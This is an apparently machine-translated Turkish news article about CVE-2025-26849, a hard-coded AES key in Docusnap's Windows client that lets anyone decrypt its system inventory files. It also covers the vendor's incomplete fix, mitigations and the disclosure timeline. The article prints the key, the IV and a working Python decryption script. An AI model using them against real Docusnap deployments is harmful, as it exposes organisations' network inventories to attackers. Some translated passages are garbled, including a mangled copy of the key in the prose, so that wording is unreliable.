DocUSNAP’ın Windows istemci yazılımında (CVE-2025-26849) yakın zamanda açıklanan bir güvenlik açığı, saldırganların sabit kodlu bir şifreleme anahtarı aracılığıyla duyarlı sistem envanter dosyalarını şifresini çözmesini ve kritik ağ bilgilerini potansiyel sömürüye maruz bırakmasını sağlar.
Redteam Pentesting GmbH’deki siber güvenlik araştırmacıları, Windows için DocUSNAP istemcisi tarafından oluşturulan envanter dosyalarını – yüklü uygulamalar, güvenlik duvarı konfigürasyonları ve yerel yönetici hesapları gibi ayrıntıları içerdiğini ortaya koydu – korumayı belirlenmiş rakiplere karşı etkisiz hale getiren zayıf şifreleme mekanizmaları kullandı.
Güvenlik açığının teknik dökümü
Pazar lideri bir BT altyapı belgeleri aracı olan Docusnap, Windows alanlarından sistem verilerini otomatik olarak toplamak için istemci aracılarını kullanır.
Toplanan bilgiler, merkezi bir sunucuya yüklenmeden önce AES-256-CBC şifrelemesi kullanılarak şifrelenmiş XML dosyaları olarak saklanır. Ancak, güvenlik analistleri iki kritik uygulama kusuru keşfetti:
Windows istemcisinde statik şifreleme anahtarı
DocUSNAP’ın .NET tabanlı sunucu bileşenlerinin adli muayenesi, tüm Windows envanter dosyalarının sabit kodlu AES şifreleme anahtarını (“Pys6IB-JY {& 7+C/3un, 1a?
Bu statik uygulama, uygulama ikili dosyalarına erişimi olan herkesin şifre çözme parametrelerini çıkarmasına izin verdi.
Bu değerleri çıkaran saldırganlar, basit bir Python betiği kullanarak herhangi bir envanter dosyasını şifresini çözebilir:
from base64 import b64decode
import click
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import unpad
K = "Pys6iB-jY{,&7+c/3uN,1a?~{2wC:L^x".encode("utf-8")
IV = "N7IPe~R}w;1vuy5N".encode("utf-8")
@click.command()
@click.argument("file", type=click.File("r"))
def decrypt(file):
data = file.read()
raw = b64decode(data)
cipher = AES.new(K, AES.MODE_CBC, iv=IV)
res = unpad(cipher.decrypt(raw), AES.block_size)
print(res.decode("utf-8"))
if __name__ == "__main__":
decrypt()Yetersiz satıcı iyileştirmesi
Kasım 2024’te bilgilendirilmesine rağmen, Docusnap’ın 14 sürümündeki ilk yaması, kusurlu statik şifreleme yaklaşımını korurken sadece AES tuşunu döndürdü.
RedTeam araştırmacıları, bu “müstehcenlik yoluyla güvenlik” önlemleri, gizlenmiş montajlardan güncellenmiş anahtarları çıkarmak için .NET yansıma tekniklerini kullanarak atladılar.
Satıcı henüz siber güvenlik uzmanları tarafından önerilen asimetrik şifreleme veya kurulum başına benzersiz anahtarlar uygulamamıştır.
Operasyonel etki ve risk değerlendirmesi
Güvenlik açığı (CVSSV3: 5.3 ortamı) kimlik bilgilerini açığa çıkarmazken veya doğrudan sistem erişimini etkinleştirmese de, iç tehdit aktörleri ve tehlikeye atılan hesaplar için engelleri önemli ölçüde düşürür:
- Etki Alanı boyunca savunmasız yazılım dağıtımlarını harita
- Yanlış yapılandırılmış güvenlik duvarı kurallarını belirleyin
- Yanal hareket için ayrıcalıklı yerel hesapları keşfedin
Düzenleyici uyum belgelemeleri için DocUSNAP kullanan kuruluşlar, yanlışlıkla hassas verilerin konsantre depoları oluşturabilir ve kriptografik kontrollerle ilgili GDPR ve HIPAA gereksinimlerini ihlal edebilir.
Azaltma stratejileri
DocUSNAP kriptografik olarak sağlam bir düzeltme yayınlayana kadar, işletmeler bu geçici çözümleri uygulamalıdır:
- SMB pay izinlerini kısıtlayın
“Kimlik Doğrulanmış Kullanıcılar”, özel hizmet hesaplarına erişimi sınırlayarak DocUSNAP envanter payına erişimi okur. - Dosya erişim modellerini izleyin
Şüpheli erişim girişimlerini tespit etmek için envanter dizinlerine gerçek zamanlı denetim uygulayın. - Ağ segmentasyonu ile ek
Potansiyel ihlaller içerecek şekilde DocUSNAP sunucularını ve genel kullanıcı ağlarından depolamayı izole edin.
Açıklama zaman çizelgesi, üçüncü taraf risk yönetiminde devam eden zorlukları vurgular:
| Tarih | Etkinlik |
| 2024-09-12 | Güvenlik açığı keşfedildi |
| 2024-12-04 | Docusnap V14 Eksik düzeltme ile yayınlandı |
| 2025-03-04 | Kamu Danışmanlığı Yayınlandı |
Siber güvenlik analisti Dr. Elena Voss şunları kaydetti: “Bu dava, çevre güvenliğine aşırı güvenmenin genellikle iç şifreleme uygulamalarını nasıl ihmal ettiğini örnekliyor. Satıcılar ‘benign’ arka uç işlemlerinde bile sıfır tröst ilkelerini benimsemelidir. ”
DocUSNAP güvenlik açığı, kurumsal yazılım güvenlik tasarımındaki kritik boşlukların altını çizer – özellikle sert kodlanmış kimlik bilgilerinin ve yetersiz erişim kontrollerinin tehlikeleri.
Düşük bir şiddet olarak derecelendirilirken, kusur saldırganlara tam olarak hedeflenen müdahaleler yapmak için gereken sistem zekasını sağlar.
DocUSNAP kullanan kuruluşlar, satıcıya temel şifreleme iyileştirmeleri için baskı yaparken derhal erişim kısıtlamalarını uygulamalıdır.
Dokümantasyon araçları, hassas verileri giderek daha fazla birleştirirken, titiz üçüncü taraf risk değerlendirmeleri, merkezi veri yosunların düşman altın olmasını önlemek için çok önemli hale gelir.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.